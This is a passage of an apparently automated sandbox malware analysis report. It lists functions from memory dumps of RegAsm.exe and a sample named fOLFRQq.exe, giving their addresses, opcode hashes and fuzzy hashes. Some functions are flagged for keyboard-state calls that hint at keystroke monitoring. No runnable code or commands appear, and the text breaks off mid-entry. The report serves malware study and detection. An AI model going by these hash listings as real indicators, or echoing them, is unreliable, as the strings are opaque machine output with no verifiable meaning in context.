Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb1b46907dcb219512416e72162f556d6a18dc467444f40154bc9d2ba25d115c
Instruction ID: 1300ad60f55434ceb723fd82e33d8fc1b873cbc801870da26f9b2e9af4503948
Opcode Fuzzy Hash: fb1b46907dcb219512416e72162f556d6a18dc467444f40154bc9d2ba25d115c
Instruction Fuzzy Hash: C9F0A0B6B042045FD3049B6ED840B6BFBEDFFE9620F21846BE104D7361CA71DC0186A0

Function 055465E0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32948aa49cfe366fc5a458ea34c80ba4c635c40d74bae1be1d693fd6d6108c6
Instruction ID: 807178be9dbf5d6b8c23f929baed2d4348185fa55763e0ab61fb207667894694
Opcode Fuzzy Hash: c32948aa49cfe366fc5a458ea34c80ba4c635c40d74bae1be1d693fd6d6108c6
Instruction Fuzzy Hash: F9E06D317002186FD3049A5A9C40E6BFBEDFFD9A20B21806AE504D7360CAB0AC0186A4

Function 05546830 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e306298e5d2ae901ed58788aae52e3df613077ada4c687cb73507d946eba141c
Instruction ID: 4a8c9f69b9586c4cc30d15750ec77972bce9aa1f324bb6367ac0b4b7de3d1580
Opcode Fuzzy Hash: e306298e5d2ae901ed58788aae52e3df613077ada4c687cb73507d946eba141c
Instruction Fuzzy Hash: 9FF0DAB4E0420A9FDB54DFA9C846BAEBBF4BB48304F1049A9E918E7200D77195018F90

Function 05544188 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941cf038774d73b4adb8b3a8f1ba9c5596c5c633091d6f58be71fab8c1f52d8e
Instruction ID: fc48eeecc3ff4c61b68a0d1a339330dd5b54478663ab3672a146434ccf9d1052
Opcode Fuzzy Hash: 941cf038774d73b4adb8b3a8f1ba9c5596c5c633091d6f58be71fab8c1f52d8e
Instruction Fuzzy Hash: E4E04F317501109B4B049A5F9888A6ABBEBFBD956536540BEE10DCB315DE22DC028B90

Function 05546630 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61c6f49c66580c06fe4595f2215d0f8d8bdb8004bbc4df198d4c3c7e371f2f2
Instruction ID: 40330a50e412c767109be281f425ad66b74e92261d1aeae3b2f6444f2cd4ac19
Opcode Fuzzy Hash: e61c6f49c66580c06fe4595f2215d0f8d8bdb8004bbc4df198d4c3c7e371f2f2
Instruction Fuzzy Hash: A9E0EC363056146FC3149A4EEC88D46FBEDEFC9771B55806AFA09C7761CA71AC01CAA4

Function 05542714 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8c6b8ff4497f05989a4cb73fa798215f321652acfedfaf614df58a999425d4
Instruction ID: d1462606d74714fa505fd0341be9b720f6d9979fd3b8c37707b4526d89332e53
Opcode Fuzzy Hash: 3a8c6b8ff4497f05989a4cb73fa798215f321652acfedfaf614df58a999425d4
Instruction Fuzzy Hash: 58E0EC31345711D74B349E68A44476BB7FAFB857597000E5BE556C3A00DB61E9088BCA

Function 055429D8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 262412f9fb6b4128833224bd0667722cb99b0099b2eff491df3afbd7f2f802d9
Instruction ID: d893e4af206ca60d9a1473087b53850d8073fd27bd97fbc41886fb4c01da0a47
Opcode Fuzzy Hash: 262412f9fb6b4128833224bd0667722cb99b0099b2eff491df3afbd7f2f802d9
Instruction Fuzzy Hash: 82E092F5D15209DFCB41EFB0DA4569CBBB1FF85301F108AA9D808B7210DA366E10DB84

Function 055429E8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c255549192fae9946c62a37c14d8c3eabf32bd684c6a8833768892b6d8ea5e3
Instruction ID: 00b9c8da24743e3fb85536926d931688cd36e1a54e272c3f8dd5bebd33df81da
Opcode Fuzzy Hash: 6c255549192fae9946c62a37c14d8c3eabf32bd684c6a8833768892b6d8ea5e3
Instruction Fuzzy Hash: D7E04FB490220DEFCB00EFA5D94199CBBB9FB88200B1085A9D808A7310DA352E109B89

Function 055467D8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2433cb0b1bb61ef11b7d4578f64f8f29772faa30d2478913e2a89ca7daf95338
Instruction ID: 1d0f665cbd3807ae51d368dab05ff845873722f493c1d9851abd65c93bf1094a
Opcode Fuzzy Hash: 2433cb0b1bb61ef11b7d4578f64f8f29772faa30d2478913e2a89ca7daf95338
Instruction Fuzzy Hash: 97E0B6B0D40209DFDB40EFB9C905B9EBBF1BF08604F21C9A9D019E7221E77496058F91

Function 05542730 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7926eaf048c83abd66004b55168c5f7af20dde84d2b26ec6c7cd0c785691bd43
Instruction ID: ef38583f15649d010f497b467abeb2e0612c30f049dac81bfa2702f35da86ccc
Opcode Fuzzy Hash: 7926eaf048c83abd66004b55168c5f7af20dde84d2b26ec6c7cd0c785691bd43
Instruction Fuzzy Hash: 55C012700106008BCF1C9F1894883943E60BF81318B700A4E90194D2C1C732C547CFD1

Function 055468E2 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42fabd0f89d38cb43d6e03db41857e170b64a9a02e4549a5e74af11a6083b1a
Instruction ID: d50051b1eecfdb712462730efc578a345f58c5830bd2ae810d7104debce7fc5d
Opcode Fuzzy Hash: c42fabd0f89d38cb43d6e03db41857e170b64a9a02e4549a5e74af11a6083b1a
Instruction Fuzzy Hash: 2BB01237000008AF8B02AF80D504C487FB5BF54300300C052F1080E031D632C074EF00

Non-executed Functions

Function 0737A400 Relevance: 4.6, APIs: 3, Instructions: 80keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 0737A45D
GetKeyState.USER32(00000011), ref: 0737A4A2
GetKeyState.USER32(00000012), ref: 0737A4E7

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: ec4efb66d5a6d3531b6b1d296548d91f002071bb2d19ecae22352fbbf771c503
Instruction ID: ab01faa1da713977da05a589dd2ae4d62c148976e2baba54390c1ccf208ab652
Opcode Fuzzy Hash: ec4efb66d5a6d3531b6b1d296548d91f002071bb2d19ecae22352fbbf771c503
Instruction Fuzzy Hash: 8B316FB180075A8EEB20DFAAC8497AFBFF4AF44719F20885DD049B7240C7BD5545CBA1

Function 0737A410 Relevance: 4.6, APIs: 3, Instructions: 76keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 0737A45D
GetKeyState.USER32(00000011), ref: 0737A4A2
GetKeyState.USER32(00000012), ref: 0737A4E7

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: b9710fb8e796e49ea31ea6e44db058a215f92c437f6e7ca3727d032116fd3175
Instruction ID: 824f9efbf9d3c41718b71f36dc8c6395ebeb6939e704f2d097bd1f0e83a295de
Opcode Fuzzy Hash: b9710fb8e796e49ea31ea6e44db058a215f92c437f6e7ca3727d032116fd3175
Instruction Fuzzy Hash: 0A316DB180075A8EEB20DFAAC8497AFBFF4AB44719F208819D449B7240C7B95585CBA1

Function 06FA9808 Relevance: 2.0, Instructions: 1975COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875393442.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fa0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2dda605b5be5c646fe51187ab786103688fd2fc4ed24d0bf8859e9ab699938
Instruction ID: a3aa0420b54691aa7adab21791ba703351b324f401b81e1c59eb07cd5f5ff5b6
Opcode Fuzzy Hash: 8c2dda605b5be5c646fe51187ab786103688fd2fc4ed24d0bf8859e9ab699938
Instruction Fuzzy Hash: 1C230B71D10B198ADB11EF68C8846ADF7B1FF99300F15C79AE458A7221FB70AAC5CB41

Function 0737E658 Relevance: 1.6, Strings: 1, Instructions: 366COMMON

Download Yara Rule

Strings

a&N:, xrefs: 0737E81F

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID: a&N:
API String ID: 0-921226769
Opcode ID: ba788a85caf6248cab6bdda6353640cf0cc946473cf44134b46d14388a2d714d
Instruction ID: c17accb7f57c061d75dcb46118b1ba98b2f7d26a7b583382facf8d879e4690ba
Opcode Fuzzy Hash: ba788a85caf6248cab6bdda6353640cf0cc946473cf44134b46d14388a2d714d
Instruction Fuzzy Hash: 7C023531D1065A8BDB14EBA8C850ADDB775FFD9300F10869AD24A7B261EF706AC48F91

Function 07375E00 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d4e1097bfc7ed92f8ed3ebad25211d444303f1a1d3222cf81852637518f2046
Instruction ID: 6418af7592eae6772dda46b0e0da0d33051fe37d768a3a8496aaeaf90b6fbcae
Opcode Fuzzy Hash: 3d4e1097bfc7ed92f8ed3ebad25211d444303f1a1d3222cf81852637518f2046
Instruction Fuzzy Hash: 7022A270B006068FEB64DB68C494AADB7F6EF89310F65846AD40ADB3A1DB35DC41CB91

Function 0737CE78 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876059138.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7370000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cda5cc10d638c52a6dc0113773113b89162ab9ba19c9d24f60874551f02d9de
Instruction ID: e003926aae1d2a582a9f9b4a4ef133cc665829161ce30653179cfb45274fcc2e
Opcode Fuzzy Hash: 1cda5cc10d638c52a6dc0113773113b89162ab9ba19c9d24f60874551f02d9de
Instruction Fuzzy Hash: DA0239B4B101018FEB24DF68C894B6AB7F5FF49710F1184A9E90ADB7A2C675EC41CB61

Function 0730C123 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bdb3044bd876e70b79f970c3480adc2013ab7a596fa90c8d6d9ab4cf8e711f1
Instruction ID: 49f232d2846f1ef8106c348fa288ad89561baa75ece864cf034238d633df16a1
Opcode Fuzzy Hash: 2bdb3044bd876e70b79f970c3480adc2013ab7a596fa90c8d6d9ab4cf8e711f1
Instruction Fuzzy Hash: 74E117B1B101158FEB14CB69D4A0AEEBBB6FF89310F24956AE40ADB391C631DC45C7E0

Function 05542D58 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae36ff2057afcb7bda618a0c4214e89cd7827457328526fa1dae5d0a8bd8669
Instruction ID: 17a42db5dc8a20434d5c728c3246d7574bea5b34eee35754d9e5503c612218fc
Opcode Fuzzy Hash: eae36ff2057afcb7bda618a0c4214e89cd7827457328526fa1dae5d0a8bd8669
Instruction Fuzzy Hash: 8ED1FA3581076A9ADB00EF68D950AD9F3B5FFD5300F2087AAD5093B221EF746AC4CB91

Function 05542D68 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3872795230.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5540000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a063b4135668419546fb69f88c74c6542bc20db1965d4d0703bcf95a48d1bb1a
Instruction ID: 7ce6106e84effb4dfa33d03aeafa2ed58e427a9b89bc7a19fb303836f440101f
Opcode Fuzzy Hash: a063b4135668419546fb69f88c74c6542bc20db1965d4d0703bcf95a48d1bb1a
Instruction Fuzzy Hash: 80D1E93581176A9ADB00EF68D950AD9F3B5FFD5300F2087AAD5093B221EF746AC4CB91

Function 07302BA8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3875758566.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7300000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee5621cc553f204cb3e78b8c7e94a9e495f381cddc7f152255408159d5abd72
Instruction ID: 0fb6d303b9d2d1a74d3b7c0bcaf2ac745cd96438658a574110bd69477253d064
Opcode Fuzzy Hash: eee5621cc553f204cb3e78b8c7e94a9e495f381cddc7f152255408159d5abd72
Instruction Fuzzy Hash: 18A182B6E10209CFDF19DFB4C89459EBBB2FF85300B15456AE80AAB261DB71D905CF80

Analysis Process: fOLFRQq.exePID: 4496, Parent PID: 4084COMMON

Executed Functions

Function 00D30E30 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670e8950b64c51c1fe2d626afc39989586734b9ff4176b086f1021cf298395cf
Instruction ID: 67e91a6a9fb88de168a057945498d4e0db2c12cee32e5068ae380bb3293a97b3
Opcode Fuzzy Hash: 670e8950b64c51c1fe2d626afc39989586734b9ff4176b086f1021cf298395cf
Instruction Fuzzy Hash: DF0290306007168FCB14DF64D890AAEBBF2FF88310F648969D9459B355DB31ED42CBA1

Function 00D309B0 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6de6e896528716eeb83c86fbffc0870c0d5857387106238364529209acac7208
Instruction ID: ee9b631de51341eca3d78f94f2eeb0ba181fda1dbbef101bbcb3cc9cf690cf88
Opcode Fuzzy Hash: 6de6e896528716eeb83c86fbffc0870c0d5857387106238364529209acac7208
Instruction Fuzzy Hash: 6AC16F34201305CFD719DF34D4A4B29BBE2BF89701F648869E8569B365EB71ED81CBA0

Function 00D308B0 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97bf0638ed9c4e13bd3ebc9b960960c95d496506f5681ac4eac95f12a3b79ffe
Instruction ID: f5ea7842e2a72232f240b19a2fd852069bdb5f32860656b33bc02bb79b21923f
Opcode Fuzzy Hash: 97bf0638ed9c4e13bd3ebc9b960960c95d496506f5681ac4eac95f12a3b79ffe
Instruction Fuzzy Hash: 06214A35300510CFCB59EB38D468A2D77E2AF89A1272905A9E40ACF372DF32DC42CB90

Function 00D31498 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838806d9e4ec78ae8f956974b0be5b0b290f8e8c8c0d621ffa669276a9e8b94e
Instruction ID: 66037fc15789a502445009f00715b28ea647c684b2392658c2bbbb9156e7ff8d
Opcode Fuzzy Hash: 838806d9e4ec78ae8f956974b0be5b0b290f8e8c8c0d621ffa669276a9e8b94e
Instruction Fuzzy Hash: 5501D231F001149FD704ABB4E8157ADBFB6DF8A700F1080AAD609AB391DE749C01CB91

Function 00D31348 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d27184c975b3fcb97d1e054c74ca9d29a5a9074c119f8e017bedca15dc2f03e
Instruction ID: 92aef0251c04d356279bce99d5101a375b2befa88b375d1bd1b899982f3280e2
Opcode Fuzzy Hash: 5d27184c975b3fcb97d1e054c74ca9d29a5a9074c119f8e017bedca15dc2f03e
Instruction Fuzzy Hash: FB01F97A701611DFC7259B24E868E2E7BA0FF88B60B554555E8468B318DE31DC0187B1

Function 00D31421 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c02cd7b99ee79b5d8ace782d9cfecc27119a98c39b4ffdd928c8138ff5363272
Instruction ID: f33a8f7cbdcc40819d674702e12f9158e8e7195a18c58347279439f5819964cf
Opcode Fuzzy Hash: c02cd7b99ee79b5d8ace782d9cfecc27119a98c39b4ffdd928c8138ff5363272
Instruction Fuzzy Hash: DFF0BE7270A3540FD31956745C20BAF6BFAEFC961175444AEE40AD7351EE384D0683A5

Function 00D30868 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb94b6dc147212f4a260fc323f48982447c1e516ff44d3edb0265ba92f1ad55
Instruction ID: 1b0266a0cb878978b9372e1ce5ad27f9bb4a575d2aa5e45acd56f98d1e3421bb
Opcode Fuzzy Hash: 2cb94b6dc147212f4a260fc323f48982447c1e516ff44d3edb0265ba92f1ad55
Instruction Fuzzy Hash: 60E01276A05119BF9B08EFF9E8585DEBFEDFB48262B148067E009D3210FF7159418B90

Function 00D31539 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fd396d8a62f2a423f91b6d9eb75ec0096c44cf2c31d4aaccbe8295b7eef0838
Instruction ID: f4b67c36f2516696ef9c606955c41f6b4c96c3071de6e6d3d6e46370b38c1c06
Opcode Fuzzy Hash: 9fd396d8a62f2a423f91b6d9eb75ec0096c44cf2c31d4aaccbe8295b7eef0838
Instruction Fuzzy Hash: 61E0AB3A5007004FD30AF370B02072C7BF16BC4650F88446AC0868B389EB208D018BD2

Function 00D30857 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d32a7b8b395a2cb7ffbe72020f3de47675c39ce139901209505647abbbecb3f
Instruction ID: 52896c912035b2c8efbccbab90b856340a1169b61c3793a6f04b0017a9d45ac0
Opcode Fuzzy Hash: 0d32a7b8b395a2cb7ffbe72020f3de47675c39ce139901209505647abbbecb3f
Instruction Fuzzy Hash: 4EE09275A04149AFCB04DFB999587CABFE9FF48111F5480AEE008E3310FA3055008765

Function 00D31489 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34e749cdcf033086389b6f04adaa45ce8b51cc9c4194e49c3a4c72d064ae65a
Instruction ID: 862bc4d9598e217a900f1219ec017f9990bee8fd7256438e13f57519d94d2193
Opcode Fuzzy Hash: a34e749cdcf033086389b6f04adaa45ce8b51cc9c4194e49c3a4c72d064ae65a
Instruction Fuzzy Hash: DCD0A732A0DA505BC72162B16C1638C7F74CA03250F0840FBD484D71A1F7488A1483E3

Function 00D313E0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71357696d9ca77b780613e7645acecb491d5da1f67536dfdbbfca648678d28d4
Instruction ID: b5e24eb6aa1c5abf9ebb63b5921135e75598f1b2a472bd1f177bea594c487332
Opcode Fuzzy Hash: 71357696d9ca77b780613e7645acecb491d5da1f67536dfdbbfca648678d28d4
Instruction Fuzzy Hash: EFE0C2381096C48FD70A9F20EA346603FA19705315F8414ABD4418B37AE6348844CB50

Function 00D31590 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1544548478.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d30000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45fe1011a9137a8a01176e9e91aa2de1678f2e66a30afdb7f157cff19b54aa35
Instruction ID: d7d3b6bf09482536341d9e2e7ebc22af0168a74f36a3de01adcdcb30f17c094b
Opcode Fuzzy Hash: 45fe1011a9137a8a01176e9e91aa2de1678f2e66a30afdb7f157cff19b54aa35
Instruction Fuzzy Hash: EEB0126A45C79D07D61175647C6930577802774A0DFC044B9CE85832C3F148380E85C7

Analysis Process: fOLFRQq.exePID: 2916, Parent PID: 4084COMMON

Executed Functions

Function 017C0E30 Relevance: .4, Instructions: 440COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92b86b511c7eff47faf390cc03bc16e8b881183045e8eb540d47ff7be4638a34
Instruction ID: 02766adea99fd208424aa8e410cca4a3182b10516147872882bfba12e72d959e
Opcode Fuzzy Hash: 92b86b511c7eff47faf390cc03bc16e8b881183045e8eb540d47ff7be4638a34
Instruction Fuzzy Hash: 79028A70A00216CFCB15DF68D884AAEBBF2FF88714B64856DD9059B356DB31EC42CB91

Function 017C09B0 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76bd3df6ffb9b4988b8c33af0adf505c566dd12cf2b35a1bbc3c0180bbfcd623
Instruction ID: 3065314ac3547502bc8568da4b156d33abef58e99a526b117612cc6531745fd6
Opcode Fuzzy Hash: 76bd3df6ffb9b4988b8c33af0adf505c566dd12cf2b35a1bbc3c0180bbfcd623
Instruction Fuzzy Hash: EFD12A38700305CFE719DF28D448A29BBE2FB89B04F5484ACE9168B365DB75ED91CB91

Function 017C08B0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55d7d5af2182b2b7541363c1cdea67deb9c7dd363b4bf9d2a9f24b470d0e88e
Instruction ID: b9a1f2b75ede0a05a3feb9db86458633989c3ec59d34feb0e09cd280db194e3c
Opcode Fuzzy Hash: e55d7d5af2182b2b7541363c1cdea67deb9c7dd363b4bf9d2a9f24b470d0e88e
Instruction Fuzzy Hash: E5212A74300611CFDB59EB38D468A2D77F2AF89A1232105ADE406CB371DB32DC02CB80

Function 017C1498 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1629485461.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_fOLFRQq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9c01f481569e1172d9c945ea34abb72aa8f00a2120915fdaa671fb558339b3
Instruction ID: c403fef68c8a9c72c2ba658839448c599f7932c07b06e951c72c10655673677d
